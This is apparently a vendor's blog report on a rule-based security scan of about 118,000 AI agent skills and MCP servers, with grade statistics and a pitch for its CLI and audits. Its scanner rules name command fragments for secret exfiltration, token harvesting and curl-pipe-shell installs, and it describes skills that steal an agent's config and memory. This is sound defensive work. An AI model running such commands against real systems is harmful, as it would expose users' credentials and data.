We Security-Graded 117,854 AI Agent Skills. Here's What We Found.

By Jason Zhu · June 22, 2026 · 8 min read Security Data

The uncomfortable part isn't the skills that are unsafe. It's how few have been checked at all.

Installing an AI agent skill or MCP server means handing untrusted code your shell, your environment variables, and increasingly your agent's own config and memory. Discovery is easy — there are tens of thousands to pick from. Knowing whether the one you found is safe to run is not.

So we scanned the whole catalog. Here's the honest picture.

How we scanned

A rule-based scanner, modeled on SlowMist's Agent Security Framework and its 11 red-flag categories. It runs static checks over each skill's README and code, looking for concrete patterns: outbound data exfiltration (curl -d $(...)), credential harvesting (env | grep -i token), reading .env / .ssh / .aws, curl | sh install scripts, privilege escalation, persistence, and secret-exfil combos. Each skill gets a grade — safe / caution / unsafe / reject — plus the specific flags it tripped. Skills with no README or too new to fetch stay unknown.

This is deliberately a first layer: it catches patterns, not intent. A clean-looking skill can still do something semantically nasty; that's what an on-demand deep scan is for. But at 117K scale, the pattern layer is what makes the catalog auditable at all.

Why this report uses only the rule layer

Security grading here is layered, and this report deliberately uses just the first one:

Layer 1 — rule-based (this report). Pattern matching, ~10ms per repo, free across the entire catalog. It's the only layer cheap enough to grade all 117K, so every number here comes from it. It also reads patterns, not intent — which is exactly why 3% is a floor.
Deeper, per-skill, on demand. Judging intent (is this curl | sh installing Homebrew, or exfiltrating a key?) and AST/taint-level analysis belong at the single-skill level, run on request — not swept across the whole catalog, where they'd be too expensive and too noisy. That's the on-demand / enterprise layer, and it's where the stricter checking lives.

So this isn't the deepest look we can take at one skill — it's the broadest honest look we can take at all of them. If you need a deep audit on a specific skill, that's agentskillshub.top/enterprise.

On the roadmap — the deeper layers Coming soon

Semantic LLM review — an LLM judges intent on flagged skills (is this curl | sh installing Homebrew, or stealing a key?) to cut false positives. Built; being enabled.
Deep per-skill audit — AST + taint + YARA analysis (via NVIDIA's open-source SkillSpector) for a single skill, on demand. In development; the enterprise layer.

Neither runs across the catalog (by design), so the numbers in this report stay rule-based — and stay a floor.

Finding 1 — 82% of the catalog has never been graded

Of 117,854 indexed skills, only 20,853 (17.7%) clear 5 stars — the threshold where a skill is popular enough to be worth grading. The other ~97,000 are effectively unaudited.

This is the headline most directories bury. "We have 117K skills" is not a feature. The number that matters is how many you can actually trust, and for the long tail the honest answer is: nobody has looked.

Finding 2 — Among graded skills, 1 in 32 is unsafe or worse

For the 20,853 graded skills, here's the grade distribution:

Security grade distribution — graded skills (stars ≥ 5, n = 20,853)

safe85.5%

caution5.3%

unsafe3.0%

reject0.1%

unknown6.1%

8.4% carry a security concern. 3.1% — about 1 in 32 — are unsafe or reject. Not a crisis-grade 40%, but not nothing: at this catalog's size that's roughly 650 graded skills you genuinely should not run blind, sitting in the same search results as everything else.

Finding 3 — Popularity predicts safety. The risk lives in the long tail.

Split the graded skills by star count and the unsafe/reject rate falls off a cliff:

Share flagged unsafe or reject, by popularity tier

5–20★4.1%

20–100★3.7%

100–1,000★0.9%

1,000★+0.4%

The skill you've heard of is almost certainly fine. The danger is the obscure 7-star repo you'd grab from a search for a niche task — exactly the moment a directory is supposed to help, and usually doesn't.

Finding 4 — The red flags include a new, agent-native attack surface

Most common flags among a sample of 1,000 flagged skills:

Most common red flags — orange = agent-native (reads your agent's config / memory)

sudo usage483

background service install152

curl | shell99

agent config theft87

tunnel service66

eval()52

sensitive env vars34

agent memory theft23

backdoor install11

The classic shell risks dominate. But look at agent config theft (87) and agent memory theft (23): skills that read your agent's configuration and memory files. That's not a server exploit — it's a new attack surface that only exists because you're running an agent. Your Claude/MCP config, your stored context, your credentials-by-proxy. The threat model moved, and most directories haven't noticed.

Finding 5 — Where the risk concentrates

By category, the unsafe/reject rate (samples ≥ 150):

Category	Sample	Unsafe / reject
`claude-skill`	3,386	3.7%
`mcp-server`	8,970	3.4%
`codex-skill`	2,656	3.2%
`agent-tool`	4,779	2.5%

The skill/MCP formats themselves — the ones that run inside your agent — carry the most risk. Which is exactly the point.

What to do about it

Check the trust signal before you install, from where you already work:

npx @agentskillshub/cli search "postgres mcp" --safe
npx @agentskillshub/cli audit owner/repo

Every result carries its grade and the specific flags it tripped. --safe hides anything unaudited or worse.

The honest caveats (because that's the whole point)

Our 3% is a floor, not a ceiling. Academic deep-analysis studies (e.g. Liu et al., 2026, arXiv:2601.10338, n=31,132) put the agent-skill vulnerability rate at 26.1%, because they analyze semantics, not just patterns. Our rule-based first pass deliberately under-claims — it only marks unsafe on concrete red flags. Read 3% as the lower bound of a bigger problem.
Rule-based ≠ complete. Pattern matching catches patterns. Semantic backdoors need a deeper look — that's the on-demand layer, not this.
◯ unknown is not "probably fine." It means no one has checked. 97K of the catalog is unknown. We label it gray and don't dress it up.
All numbers are reproducible. Every grade is visible on the site and via the CLI. Re-derive them yourself.

A trust layer that only told you the good news wouldn't be one. The most useful thing we can say about 97,000 skills is that we don't yet know — and we'll tell you that to your face.

Check before you install: npx @agentskillshub/cli search "<what you need>" --safe · or browse graded skills at agentskillshub.top.
For teams: deeper per-skill audits and compliance evidence at agentskillshub.top/enterprise.